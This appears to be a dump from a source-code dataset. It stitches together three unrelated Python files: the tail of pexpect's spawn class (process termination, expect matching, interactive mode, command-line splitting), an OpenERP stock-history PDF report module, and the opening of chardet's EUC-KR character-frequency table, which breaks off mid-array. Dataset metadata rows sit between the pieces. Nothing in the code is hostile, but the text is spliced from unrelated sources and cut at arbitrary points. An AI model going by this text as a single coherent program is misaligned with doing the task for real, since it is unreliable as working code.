return self.flag_eof
def terminate(self, force=False):
'''This forces a child process to terminate. It starts nicely with
SIGHUP and SIGINT. If "force" is True then moves onto SIGKILL. This
returns True if the child was terminated. This returns False if the
child could not be terminated. '''
if not self.isalive():
return True
try:
self.kill(signal.SIGHUP)
time.sleep(self.delayafterterminate)
if not self.isalive():
return True
self.kill(signal.SIGCONT)
time.sleep(self.delayafterterminate)
if not self.isalive():
return True
self.kill(signal.SIGINT)
time.sleep(self.delayafterterminate)
if not self.isalive():
return True
if force:
self.kill(signal.SIGKILL)
time.sleep(self.delayafterterminate)
if not self.isalive():
return True
else:
return False
return False
except OSError:
# I think there are kernel timing issues that sometimes cause
# this to happen. I think isalive() reports True, but the
# process is dead to the kernel.
# Make one last attempt to see if the kernel is up to date.
time.sleep(self.delayafterterminate)
if not self.isalive():
return True
else:
return False
def wait(self):
'''This waits until the child exits. This is a blocking call. This will
not read any data from the child, so this will block forever if the
child has unread output and has terminated. In other words, the child
may have printed output then called exit(), but, the child is
technically still alive until its output is read by the parent. '''
if self.isalive():
pid, status = os.waitpid(self.pid, 0)
else:
raise ExceptionPexpect('Cannot wait for dead child process.')
self.exitstatus = os.WEXITSTATUS(status)
if os.WIFEXITED(status):
self.status = status
self.exitstatus = os.WEXITSTATUS(status)
self.signalstatus = None
self.terminated = True
elif os.WIFSIGNALED(status):
self.status = status
self.exitstatus = None
self.signalstatus = os.WTERMSIG(status)
self.terminated = True
elif os.WIFSTOPPED(status):
# You can't call wait() on a child process in the stopped state.
raise ExceptionPexpect('Called wait() on a stopped child ' +
'process. This is not supported. Is some other ' +
'process attempting job control with our child pid?')
return self.exitstatus
def isalive(self):
'''This tests if the child process is running or not. This is
non-blocking. If the child was terminated then this will read the
exitstatus or signalstatus of the child. This returns True if the child
process appears to be running or False if not. It can take literally
SECONDS for Solaris to return the right status. '''
if self.terminated:
return False
if self.flag_eof:
# This is for Linux, which requires the blocking form
            # of waitpid to get status of a defunct process.
# This is super-lame. The flag_eof would have been set
# in read_nonblocking(), so this should be safe.
waitpid_options = 0
else:
waitpid_options = os.WNOHANG
try:
pid, status = os.waitpid(self.pid, waitpid_options)
except OSError:
err = sys.exc_info()[1]
# No child processes
if err.errno == errno.ECHILD:
raise ExceptionPexpect('isalive() encountered condition ' +
'where "terminated" is 0, but there was no child ' +
'process. Did someone else call waitpid() ' +
'on our process?')
else:
raise err
# I have to do this twice for Solaris.
# I can't even believe that I figured this out...
# If waitpid() returns 0 it means that no child process
# wishes to report, and the value of status is undefined.
if pid == 0:
try:
### os.WNOHANG) # Solaris!
pid, status = os.waitpid(self.pid, waitpid_options)
except OSError as e:
# This should never happen...
if e.errno == errno.ECHILD:
raise ExceptionPexpect('isalive() encountered condition ' +
'that should never happen. There was no child ' +
'process. Did someone else call waitpid() ' +
'on our process?')
else:
raise
# If pid is still 0 after two calls to waitpid() then the process
# really is alive. This seems to work on all platforms, except for
# Irix which seems to require a blocking call on waitpid or select,
# so I let read_nonblocking take care of this situation
# (unfortunately, this requires waiting through the timeout).
        if pid == 0:
            return True
if os.WIFEXITED(status):
self.status = status
self.exitstatus = os.WEXITSTATUS(status)
self.signalstatus = None
self.terminated = True
elif os.WIFSIGNALED(status):
self.status = status
self.exitstatus = None
self.signalstatus = os.WTERMSIG(status)
self.terminated = True
elif os.WIFSTOPPED(status):
raise ExceptionPexpect('isalive() encountered condition ' +
'where child process is stopped. This is not ' +
'supported. Is some other process attempting ' +
'job control with our child pid?')
return False
def kill(self, sig):
'''This sends the given signal to the child application. In keeping
with UNIX tradition it has a misleading name. It does not necessarily
kill the child unless you send the right signal. '''
# Same as os.kill, but the pid is given for you.
if self.isalive():
os.kill(self.pid, sig)
def _pattern_type_err(self, pattern):
raise TypeError('got {badtype} ({badobj!r}) as pattern, must be one'
' of: {goodtypes}, pexpect.EOF, pexpect.TIMEOUT'\
.format(badtype=type(pattern),
badobj=pattern,
goodtypes=', '.join([str(ast)\
for ast in self.allowed_string_types])
)
)
def compile_pattern_list(self, patterns):
'''This compiles a pattern-string or a list of pattern-strings.
Patterns must be a StringType, EOF, TIMEOUT, SRE_Pattern, or a list of
those. Patterns may also be None which results in an empty list (you
might do this if waiting for an EOF or TIMEOUT condition without
expecting any pattern).
This is used by expect() when calling expect_list(). Thus expect() is
nothing more than::
cpl = self.compile_pattern_list(pl)
return self.expect_list(cpl, timeout)
If you are using expect() within a loop it may be more
efficient to compile the patterns first and then call expect_list().
This avoid calls in a loop to compile_pattern_list()::
cpl = self.compile_pattern_list(my_pattern)
while some_condition:
...
i = self.expect_list(clp, timeout)
...
'''
if patterns is None:
return []
if not isinstance(patterns, list):
patterns = [patterns]
# Allow dot to match \n
compile_flags = re.DOTALL
if self.ignorecase:
compile_flags = compile_flags | re.IGNORECASE
compiled_pattern_list = []
for idx, p in enumerate(patterns):
if isinstance(p, self.allowed_string_types):
p = self._coerce_expect_string(p)
compiled_pattern_list.append(re.compile(p, compile_flags))
elif p is EOF:
compiled_pattern_list.append(EOF)
elif p is TIMEOUT:
compiled_pattern_list.append(TIMEOUT)
elif isinstance(p, type(re.compile(''))):
compiled_pattern_list.append(p)
else:
self._pattern_type_err(p)
return compiled_pattern_list
def expect(self, pattern, timeout=-1, searchwindowsize=-1):
'''This seeks through the stream until a pattern is matched. The
pattern is overloaded and may take several types. The pattern can be a
StringType, EOF, a compiled re, or a list of any of those types.
Strings will be compiled to re types. This returns the index into the
pattern list. If the pattern was not a list this returns index 0 on a
successful match. This may raise exceptions for EOF or TIMEOUT. To
avoid the EOF or TIMEOUT exceptions add EOF or TIMEOUT to the pattern
list. That will cause expect to match an EOF or TIMEOUT condition
instead of raising an exception.
If you pass a list of patterns and more than one matches, the first
match in the stream is chosen. If more than one pattern matches at that
point, the leftmost in the pattern list is chosen. For example::
# the input is 'foobar'
index = p.expect(['bar', 'foo', 'foobar'])
# returns 1('foo') even though 'foobar' is a "better" match
Please note, however, that buffering can affect this behavior, since
input arrives in unpredictable chunks. For example::
# the input is 'foobar'
index = p.expect(['foobar', 'foo'])
# returns 0('foobar') if all input is available at once,
            # but returns 1('foo') if parts of the final 'bar' arrive late
After a match is found the instance attributes 'before', 'after' and
'match' will be set. You can see all the data read before the match in
'before'. You can see the data that was matched in 'after'. The
re.MatchObject used in the re match will be in 'match'. If an error
occurred then 'before' will be set to all the data read so far and
'after' and 'match' will be None.
If timeout is -1 then timeout will be set to the self.timeout value.
A list entry may be EOF or TIMEOUT instead of a string. This will
catch these exceptions and return the index of the list entry instead
of raising the exception. The attribute 'after' will be set to the
exception type. The attribute 'match' will be None. This allows you to
write code like this::
index = p.expect(['good', 'bad', pexpect.EOF, pexpect.TIMEOUT])
if index == 0:
do_something()
elif index == 1:
do_something_else()
elif index == 2:
do_some_other_thing()
elif index == 3:
do_something_completely_different()
instead of code like this::
try:
index = p.expect(['good', 'bad'])
if index == 0:
do_something()
elif index == 1:
do_something_else()
except EOF:
do_some_other_thing()
except TIMEOUT:
do_something_completely_different()
These two forms are equivalent. It all depends on what you want. You
can also just expect the EOF if you are waiting for all output of a
child to finish. For example::
p = pexpect.spawn('/bin/ls')
p.expect(pexpect.EOF)
print p.before
If you are trying to optimize for speed then see expect_list().
'''
compiled_pattern_list = self.compile_pattern_list(pattern)
return self.expect_list(compiled_pattern_list,
timeout, searchwindowsize)
def expect_list(self, pattern_list, timeout=-1, searchwindowsize=-1):
'''This takes a list of compiled regular expressions and returns the
index into the pattern_list that matched the child output. The list may
also contain EOF or TIMEOUT(which are not compiled regular
expressions). This method is similar to the expect() method except that
expect_list() does not recompile the pattern list on every call. This
may help if you are trying to optimize for speed, otherwise just use
the expect() method. This is called by expect(). If timeout==-1 then
the self.timeout value is used. If searchwindowsize==-1 then the
self.searchwindowsize value is used. '''
return self.expect_loop(searcher_re(pattern_list),
timeout, searchwindowsize)
def expect_exact(self, pattern_list, timeout=-1, searchwindowsize=-1):
'''This is similar to expect(), but uses plain string matching instead
of compiled regular expressions in 'pattern_list'. The 'pattern_list'
may be a string; a list or other sequence of strings; or TIMEOUT and
EOF.
This call might be faster than expect() for two reasons: string
searching is faster than RE matching and it is possible to limit the
search to just the end of the input buffer.
This method is also useful when you don't want to have to worry about
escaping regular expression characters that you want to match.'''
if (isinstance(pattern_list, self.allowed_string_types) or
pattern_list in (TIMEOUT, EOF)):
pattern_list = [pattern_list]
def prepare_pattern(pattern):
if pattern in (TIMEOUT, EOF):
return pattern
if isinstance(pattern, self.allowed_string_types):
return self._coerce_expect_string(pattern)
self._pattern_type_err(pattern)
try:
pattern_list = iter(pattern_list)
except TypeError:
self._pattern_type_err(pattern_list)
pattern_list = [prepare_pattern(p) for p in pattern_list]
return self.expect_loop(searcher_string(pattern_list),
timeout, searchwindowsize)
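    # Usage sketch (illustrative only): expect_exact() treats the strings as
    # literals, so regex metacharacters such as '$', '(' or '?' need no
    # escaping:
    #
    #   index = p.expect_exact(['$ ', 'Continue (y/n)?'])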
def expect_loop(self, searcher, timeout=-1, searchwindowsize=-1):
'''This is the common loop used inside expect. The 'searcher' should be
an instance of searcher_re or searcher_string, which describes how and
what to search for in the input.
See expect() for other arguments, return value and exceptions. '''
self.searcher = searcher
if timeout == -1:
timeout = self.timeout
if timeout is not None:
end_time = time.time() + timeout
if searchwindowsize == -1:
searchwindowsize = self.searchwindowsize
try:
incoming = self.buffer
freshlen = len(incoming)
while True:
# Keep reading until exception or return.
index = searcher.search(incoming, freshlen, searchwindowsize)
if index >= 0:
self.buffer = incoming[searcher.end:]
self.before = incoming[: searcher.start]
self.after = incoming[searcher.start: searcher.end]
self.match = searcher.match
self.match_index = index
return self.match_index
# No match at this point
if (timeout is not None) and (timeout < 0):
raise TIMEOUT('Timeout exceeded in expect_any().')
# Still have time left, so read more data
c = self.read_nonblocking(self.maxread, timeout)
freshlen = len(c)
time.sleep(0.0001)
incoming = incoming + c
if timeout is not None:
timeout = end_time - time.time()
except EOF:
err = sys.exc_info()[1]
self.buffer = self.string_type()
self.before = incoming
self.after = EOF
index = searcher.eof_index
if index >= 0:
self.match = EOF
self.match_index = index
return self.match_index
else:
self.match = None
self.match_index = None
raise EOF(str(err) + '\n' + str(self))
except TIMEOUT:
err = sys.exc_info()[1]
self.buffer = incoming
self.before = incoming
self.after = TIMEOUT
index = searcher.timeout_index
if index >= 0:
self.match = TIMEOUT
self.match_index = index
return self.match_index
else:
self.match = None
self.match_index = None
raise TIMEOUT(str(err) + '\n' + str(self))
except:
self.before = incoming
self.after = None
self.match = None
self.match_index = None
raise
def getwinsize(self):
'''This returns the terminal window size of the child tty. The return
value is a tuple of (rows, cols). '''
TIOCGWINSZ = getattr(termios, 'TIOCGWINSZ', 1074295912)
s = struct.pack('HHHH', 0, 0, 0, 0)
x = fcntl.ioctl(self.child_fd, TIOCGWINSZ, s)
return struct.unpack('HHHH', x)[0:2]
def setwinsize(self, rows, cols):
'''This sets the terminal window size of the child tty. This will cause
a SIGWINCH signal to be sent to the child. This does not change the
physical window size. It changes the size reported to TTY-aware
applications like vi or curses -- applications that respond to the
SIGWINCH signal. '''
# Check for buggy platforms. Some Python versions on some platforms
# (notably OSF1 Alpha and RedHat 7.1) truncate the value for
# termios.TIOCSWINSZ. It is not clear why this happens.
# These platforms don't seem to handle the signed int very well;
# yet other platforms like OpenBSD have a large negative value for
# TIOCSWINSZ and they don't have a truncate problem.
# Newer versions of Linux have totally different values for TIOCSWINSZ.
# Note that this fix is a hack.
TIOCSWINSZ = getattr(termios, 'TIOCSWINSZ', -2146929561)
if TIOCSWINSZ == 2148037735:
# Same bits, but with sign.
TIOCSWINSZ = -2146929561
# Note, assume ws_xpixel and ws_ypixel are zero.
s = struct.pack('HHHH', rows, cols, 0, 0)
fcntl.ioctl(self.fileno(), TIOCSWINSZ, s)
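    # Usage sketch (illustrative only): query the child's terminal size and
    # resize it, e.g. to mirror the controlling terminal:
    #
    #   rows, cols = p.getwinsize()
    #   p.setwinsize(24, 80)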
def interact(self, escape_character=chr(29),
input_filter=None, output_filter=None):
'''This gives control of the child process to the interactive user (the
human at the keyboard). Keystrokes are sent to the child process, and
the stdout and stderr output of the child process is printed. This
simply echos the child stdout and child stderr to the real stdout and
it echos the real stdin to the child stdin. When the user types the
escape_character this method will stop. The default for
escape_character is ^]. This should not be confused with ASCII 27 --
        the ESC character. ASCII 29 was chosen for historical reasons because
this is the character used by 'telnet' as the escape character. The
escape_character will not be sent to the child process.
You may pass in optional input and output filter functions. These
functions should take a string and return a string. The output_filter
will be passed all the output from the child process. The input_filter
will be passed all the keyboard input from the user. The input_filter
is run BEFORE the check for the escape_character.
Note that if you change the window size of the parent the SIGWINCH
signal will not be passed through to the child. If you want the child
window size to change when the parent's window size changes then do
something like the following example::
import pexpect, struct, fcntl, termios, signal, sys
def sigwinch_passthrough (sig, data):
s = struct.pack("HHHH", 0, 0, 0, 0)
a = struct.unpack('hhhh', fcntl.ioctl(sys.stdout.fileno(),
termios.TIOCGWINSZ , s))
global p
p.setwinsize(a[0],a[1])
# Note this 'p' global and used in sigwinch_passthrough.
p = pexpect.spawn('/bin/bash')
signal.signal(signal.SIGWINCH, sigwinch_passthrough)
p.interact()
'''
# Flush the buffer.
self.write_to_stdout(self.buffer)
self.stdout.flush()
self.buffer = self.string_type()
mode = tty.tcgetattr(self.STDIN_FILENO)
tty.setraw(self.STDIN_FILENO)
if PY3:
escape_character = escape_character.encode('latin-1')
try:
self.__interact_copy(escape_character, input_filter, output_filter)
finally:
tty.tcsetattr(self.STDIN_FILENO, tty.TCSAFLUSH, mode)
def __interact_writen(self, fd, data):
'''This is used by the interact() method.
'''
while data != b'' and self.isalive():
n = os.write(fd, data)
data = data[n:]
def __interact_read(self, fd):
'''This is used by the interact() method.
'''
return os.read(fd, 1000)
def __interact_copy(self, escape_character=None,
input_filter=None, output_filter=None):
'''This is used by the interact() method.
'''
while self.isalive():
r, w, e = self.__select([self.child_fd, self.STDIN_FILENO], [], [])
if self.child_fd in r:
try:
data = self.__interact_read(self.child_fd)
except OSError as e:
# The subprocess may have closed before we get to reading it
if e.errno != errno.EIO:
raise
if output_filter:
data = output_filter(data)
if self.logfile is not None:
self.logfile.write(data)
self.logfile.flush()
os.write(self.STDOUT_FILENO, data)
if self.STDIN_FILENO in r:
data = self.__interact_read(self.STDIN_FILENO)
if input_filter:
data = input_filter(data)
i = data.rfind(escape_character)
if i != -1:
data = data[:i]
self.__interact_writen(self.child_fd, data)
break
self.__interact_writen(self.child_fd, data)
def __select(self, iwtd, owtd, ewtd, timeout=None):
'''This is a wrapper around select.select() that ignores signals. If
select.select raises a select.error exception and errno is an EINTR
error then it is ignored. Mainly this is used to ignore sigwinch
(terminal resize). '''
# if select() is interrupted by a signal (errno==EINTR) then
# we loop back and enter the select() again.
if timeout is not None:
end_time = time.time() + timeout
while True:
try:
return select.select(iwtd, owtd, ewtd, timeout)
except select.error:
err = sys.exc_info()[1]
if err.args[0] == errno.EINTR:
# if we loop back we have to subtract the
# amount of time we already waited.
if timeout is not None:
timeout = end_time - time.time()
if timeout < 0:
return([], [], [])
else:
# something else caused the select.error, so
# this actually is an exception.
raise
##############################################################################
# The following methods are no longer supported or allowed.
def setmaxread(self, maxread):
'''This method is no longer supported or allowed. I don't like getters
and setters without a good reason. '''
raise ExceptionPexpect('This method is no longer supported ' +
'or allowed. Just assign a value to the ' +
'maxread member variable.')
def setlog(self, fileobject):
'''This method is no longer supported or allowed.
'''
raise ExceptionPexpect('This method is no longer supported ' +
'or allowed. Just assign a value to the logfile ' +
'member variable.')
##############################################################################
# End of spawn class
##############################################################################
class spawnu(spawn):
"""Works like spawn, but accepts and returns unicode strings.
Extra parameters:
:param encoding: The encoding to use for communications (default: 'utf-8')
:param errors: How to handle encoding/decoding errors; one of 'strict'
(the default), 'ignore', or 'replace', as described
for :meth:`~bytes.decode` and :meth:`~str.encode`.
"""
if PY3:
string_type = str
allowed_string_types = (str, )
_chr = staticmethod(chr)
linesep = os.linesep
else:
string_type = unicode
allowed_string_types = (unicode, )
_chr = staticmethod(unichr)
linesep = os.linesep.decode('ascii')
# This can handle unicode in both Python 2 and 3
write_to_stdout = sys.stdout.write
def __init__(self, *args, **kwargs):
self.encoding = kwargs.pop('encoding', 'utf-8')
self.errors = kwargs.pop('errors', 'strict')
self._decoder = codecs.getincrementaldecoder(self.encoding)(errors=self.errors)
super(spawnu, self).__init__(*args, **kwargs)
@staticmethod
def _coerce_expect_string(s):
return s
@staticmethod
def _coerce_send_string(s):
return s
def _coerce_read_string(self, s):
return self._decoder.decode(s, final=False)
def _send(self, s):
return os.write(self.child_fd, s.encode(self.encoding, self.errors))
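# Usage sketch (illustrative only; the spawned command is hypothetical):
# spawnu decodes the child's output, so expect() patterns and the
# before/after attributes are unicode strings rather than bytes:
#
#   child = spawnu('cat', encoding='utf-8')
#   child.sendline(u'unicode ok')
#   child.expect(u'unicode ok')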
class searcher_string(object):
'''This is a plain string search helper for the spawn.expect_any() method.
This helper class is for speed. For more powerful regex patterns
see the helper class, searcher_re.
Attributes:
eof_index - index of EOF, or -1
timeout_index - index of TIMEOUT, or -1
After a successful match by the search() method the following attributes
are available:
start - index into the buffer, first byte of match
end - index into the buffer, first byte after match
match - the matching string itself
'''
def __init__(self, strings):
'''This creates an instance of searcher_string. This argument 'strings'
        may be a list or other sequence of strings; or the EOF or TIMEOUT types. '''
self.eof_index = -1
self.timeout_index = -1
self._strings = []
for n, s in enumerate(strings):
if s is EOF:
self.eof_index = n
continue
if s is TIMEOUT:
self.timeout_index = n
continue
self._strings.append((n, s))
def __str__(self):
'''This returns a human-readable string that represents the state of
the object.'''
ss = [(ns[0], ' %d: "%s"' % ns) for ns in self._strings]
ss.append((-1, 'searcher_string:'))
if self.eof_index >= 0:
ss.append((self.eof_index, ' %d: EOF' % self.eof_index))
if self.timeout_index >= 0:
ss.append((self.timeout_index,
' %d: TIMEOUT' % self.timeout_index))
ss.sort()
ss = list(zip(*ss))[1]
return '\n'.join(ss)
def search(self, buffer, freshlen, searchwindowsize=None):
        '''This searches 'buffer' for the first occurrence of one of the search
strings. 'freshlen' must indicate the number of bytes at the end of
'buffer' which have not been searched before. It helps to avoid
searching the same, possibly big, buffer over and over again.
See class spawn for the 'searchwindowsize' argument.
If there is a match this returns the index of that string, and sets
'start', 'end' and 'match'. Otherwise, this returns -1. '''
first_match = None
# 'freshlen' helps a lot here. Further optimizations could
# possibly include:
#
# using something like the Boyer-Moore Fast String Searching
# Algorithm; pre-compiling the search through a list of
# strings into something that can scan the input once to
# search for all N strings; realize that if we search for
# ['bar', 'baz'] and the input is '...foo' we need not bother
# rescanning until we've read three more bytes.
#
# Sadly, I don't know enough about this interesting topic. /grahn
for index, s in self._strings:
if searchwindowsize is None:
# the match, if any, can only be in the fresh data,
# or at the very end of the old data
offset = -(freshlen + len(s))
else:
# better obey searchwindowsize
offset = -searchwindowsize
n = buffer.find(s, offset)
if n >= 0 and (first_match is None or n < first_match):
first_match = n
best_index, best_match = index, s
if first_match is None:
return -1
self.match = best_match
self.start = first_match
self.end = self.start + len(self.match)
return best_index
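# Usage sketch (illustrative only): expect_exact() builds one of these and
# hands it to expect_loop(); after a hit, start/end/match describe the match:
#
#   s = searcher_string(['password:', EOF])
#   s.search('Enter password:', 15)    # -> 0 (index of 'password:')
#   s.start, s.end, s.match            # -> 6, 15, 'password:'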
class searcher_re(object):
    '''This is a regular expression string search helper for the
spawn.expect_any() method. This helper class is for powerful
pattern matching. For speed, see the helper class, searcher_string.
Attributes:
eof_index - index of EOF, or -1
timeout_index - index of TIMEOUT, or -1
After a successful match by the search() method the following attributes
are available:
start - index into the buffer, first byte of match
end - index into the buffer, first byte after match
        match - the re.match object returned by a successful re.search
'''
def __init__(self, patterns):
        '''This creates an instance that searches for 'patterns', where
        'patterns' may be a list or other sequence of compiled regular
        expressions, or the EOF or TIMEOUT types.'''
self.eof_index = -1
self.timeout_index = -1
self._searches = []
for n, s in zip(list(range(len(patterns))), patterns):
if s is EOF:
self.eof_index = n
continue
if s is TIMEOUT:
self.timeout_index = n
continue
self._searches.append((n, s))
def __str__(self):
'''This returns a human-readable string that represents the state of
the object.'''
#ss = [(n, ' %d: re.compile("%s")' %
# (n, repr(s.pattern))) for n, s in self._searches]
ss = list()
for n, s in self._searches:
try:
ss.append((n, ' %d: re.compile("%s")' % (n, s.pattern)))
except UnicodeEncodeError:
                # For test cases that display __str__ of searches, don't
                # throw another exception just because stdout is ascii-only;
                # fall back to repr().
ss.append((n, ' %d: re.compile(%r)' % (n, s.pattern)))
ss.append((-1, 'searcher_re:'))
if self.eof_index >= 0:
ss.append((self.eof_index, ' %d: EOF' % self.eof_index))
if self.timeout_index >= 0:
ss.append((self.timeout_index, ' %d: TIMEOUT' %
self.timeout_index))
ss.sort()
ss = list(zip(*ss))[1]
return '\n'.join(ss)
def search(self, buffer, freshlen, searchwindowsize=None):
        '''This searches 'buffer' for the first occurrence of one of the regular
expressions. 'freshlen' must indicate the number of bytes at the end of
'buffer' which have not been searched before.
See class spawn for the 'searchwindowsize' argument.
If there is a match this returns the index of that string, and sets
'start', 'end' and 'match'. Otherwise, returns -1.'''
first_match = None
# 'freshlen' doesn't help here -- we cannot predict the
# length of a match, and the re module provides no help.
if searchwindowsize is None:
searchstart = 0
else:
searchstart = max(0, len(buffer) - searchwindowsize)
for index, s in self._searches:
match = s.search(buffer, searchstart)
if match is None:
continue
n = match.start()
if first_match is None or n < first_match:
first_match = n
the_match = match
best_index = index
if first_match is None:
return -1
self.start = first_match
self.match = the_match
self.end = self.match.end()
return best_index
def which(filename):
'''This takes a given filename; tries to find it in the environment path;
then checks if it is executable. This returns the full path to the filename
if found and executable. Otherwise this returns None.'''
# Special case where filename contains an explicit path.
if os.path.dirname(filename) != '':
if os.access(filename, os.X_OK):
return filename
if 'PATH' not in os.environ or os.environ['PATH'] == '':
p = os.defpath
else:
p = os.environ['PATH']
pathlist = p.split(os.pathsep)
for path in pathlist:
ff = os.path.join(path, filename)
if os.access(ff, os.X_OK):
return ff
return None
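# Usage sketch (illustrative only; the resolved path depends on the system):
#
#   which('ls')    # -> '/bin/ls' on many systems, or None if not on PATH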
def split_command_line(command_line):
'''This splits a command line into a list of arguments. It splits arguments
on spaces, but handles embedded quotes, doublequotes, and escaped
characters. It's impossible to do this with a regular expression, so I
wrote a little state machine to parse the command line. '''
arg_list = []
arg = ''
# Constants to name the states we can be in.
state_basic = 0
state_esc = 1
state_singlequote = 2
state_doublequote = 3
# The state when consuming whitespace between commands.
state_whitespace = 4
state = state_basic
for c in command_line:
if state == state_basic or state == state_whitespace:
if c == '\\':
# Escape the next character
state = state_esc
elif c == r"'":
# Handle single quote
state = state_singlequote
elif c == r'"':
# Handle double quote
state = state_doublequote
elif c.isspace():
# Add arg to arg_list if we aren't in the middle of whitespace.
if state == state_whitespace:
# Do nothing.
                    pass
else:
arg_list.append(arg)
arg = ''
state = state_whitespace
else:
arg = arg + c
state = state_basic
elif state == state_esc:
arg = arg + c
state = state_basic
elif state == state_singlequote:
if c == r"'":
state = state_basic
else:
arg = arg + c
elif state == state_doublequote:
if c == r'"':
state = state_basic
else:
arg = arg + c
if arg != '':
arg_list.append(arg)
return arg_list
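# Usage sketch (illustrative only):
#
#   split_command_line('cp "my file.txt" backup\\ dir')
#   # -> ['cp', 'my file.txt', 'backup dir']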
# vi:set sr et ts=4 sw=4 ft=python :
| mit | 6,983,308,128,741,956,000 | 39.476841 | 87 | 0.591751 | false |
bwrsandman/OpenUpgrade | addons/stock/report/product_stock.py | 376 | 4868 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from datetime import datetime
from dateutil.relativedelta import relativedelta
import openerp
from openerp import osv
import time
from openerp.report.interface import report_int
from openerp.report.render import render
import stock_graph
import StringIO
import unicodedata
class external_pdf(render):
def __init__(self, pdf):
render.__init__(self)
self.pdf = pdf
self.output_type='pdf'
def _render(self):
return self.pdf
class report_stock(report_int):
def create(self, cr, uid, ids, datas, context=None):
if context is None:
context = {}
registry = openerp.registry(cr.dbname)
product_ids = ids
if 'location_id' in context:
location_id = context['location_id']
else:
warehouse_id = registry['stock.warehouse'].search(cr, uid, [])[0]
location_id = registry['stock.warehouse'].browse(cr, uid, warehouse_id).lot_stock_id.id
loc_ids = registry['stock.location'].search(cr, uid, [('location_id','child_of',[location_id])])
now = time.strftime('%Y-%m-%d')
dt_from = now
dt_to = now
names = dict(registry['product.product'].name_get(cr, uid, product_ids))
for name in names:
names[name] = names[name].encode('utf8')
products = {}
ctx = context.copy()
ctx['location_id'] = loc_ids
prods = registry['product.product']._product_available(cr, uid, product_ids, context=ctx)
for prod in prods.keys():
products[prod] = [(now, prods[prod]['qty_available'])]
prods[prod] = 0
if not loc_ids or not product_ids:
return (False, 'pdf')
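        # Outgoing moves: pending stock leaving the selected locations lowers
        # the forecasted quantity (hence the negative sign below).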
cr.execute("select sum(r.product_qty * u.factor), r.date, r.product_id "
"from stock_move r left join product_uom u on (r.product_uom=u.id) "
"where state IN %s"
"and location_id IN %s"
"and product_id IN %s"
"group by date,product_id",(('confirmed','assigned','waiting'),tuple(loc_ids) ,tuple(product_ids),))
for (qty, dt, prod_id) in cr.fetchall():
if dt<=dt_from:
dt= (datetime.now() + relativedelta(days=1)).strftime('%Y-%m-%d')
else:
dt = dt[:10]
products.setdefault(prod_id, [])
products[prod_id].append((dt,-qty))
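        # Incoming moves: pending stock arriving at the selected locations
        # raises the forecasted quantity.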
cr.execute("select sum(r.product_qty * u.factor), r.date, r.product_id "
"from stock_move r left join product_uom u on (r.product_uom=u.id) "
"where state IN %s"
"and location_dest_id IN %s"
"and product_id IN %s"
"group by date,product_id",(('confirmed','assigned','waiting'),tuple(loc_ids) ,tuple(product_ids),))
for (qty, dt, prod_id) in cr.fetchall():
if dt<=dt_from:
dt= (datetime.now() + relativedelta(days=1)).strftime('%Y-%m-%d')
else:
dt = dt[:10]
products.setdefault(prod_id, [])
products[prod_id].append((dt,qty))
dt = dt_from
qty = 0
io = StringIO.StringIO()
gt = stock_graph.stock_graph(io)
for prod_id in products:
prod_name = names.get(prod_id,'Unknown')
if isinstance(prod_name, str):
prod_name = prod_name.decode('utf-8')
prod_name = unicodedata.normalize('NFKD',prod_name)
prod_name = prod_name.encode('ascii','replace')
gt.add(prod_id, prod_name, products[prod_id])
gt.draw()
gt.close()
self.obj = external_pdf(io.getvalue())
self.obj.render()
return (self.obj.pdf, 'pdf')
report_stock('report.stock.product.history')
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -4,353,771,666,382,752,300 | 37.03125 | 119 | 0.564708 | false |
mhotwagner/abackend | abackend-env/lib/python3.5/site-packages/pip/_vendor/requests/packages/chardet/euckrfreq.py | 3121 | 45978 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# Sampling from about 20M text materials, including literature and computer technology
# 128 --> 0.79
# 256 --> 0.92
# 512 --> 0.986
# 1024 --> 0.99944
# 2048 --> 0.99999
#
# Ideal Distribution Ratio = 0.98653 / (1-0.98653) = 73.24
# Random Distribution Ratio = 512 / (2350-512) = 0.279.
#
# Typical Distribution Ratio
EUCKR_TYPICAL_DISTRIBUTION_RATIO = 6.0
EUCKR_TABLE_SIZE = 2352
# Char to FreqOrder table
EUCKRCharToFreqOrder = ( \
13, 130, 120,1396, 481,1719,1720, 328, 609, 212,1721, 707, 400, 299,1722, 87,
1397,1723, 104, 536,1117,1203,1724,1267, 685,1268, 508,1725,1726,1727,1728,1398,
1399,1729,1730,1731, 141, 621, 326,1057, 368,1732, 267, 488, 20,1733,1269,1734,
945,1400,1735, 47, 904,1270,1736,1737, 773, 248,1738, 409, 313, 786, 429,1739,
116, 987, 813,1401, 683, 75,1204, 145,1740,1741,1742,1743, 16, 847, 667, 622,
708,1744,1745,1746, 966, 787, 304, 129,1747, 60, 820, 123, 676,1748,1749,1750,
1751, 617,1752, 626,1753,1754,1755,1756, 653,1757,1758,1759,1760,1761,1762, 856,
344,1763,1764,1765,1766, 89, 401, 418, 806, 905, 848,1767,1768,1769, 946,1205,
709,1770,1118,1771, 241,1772,1773,1774,1271,1775, 569,1776, 999,1777,1778,1779,
1780, 337, 751,1058, 28, 628, 254,1781, 177, 906, 270, 349, 891,1079,1782, 19,
1783, 379,1784, 315,1785, 629, 754,1402, 559,1786, 636, 203,1206,1787, 710, 567,
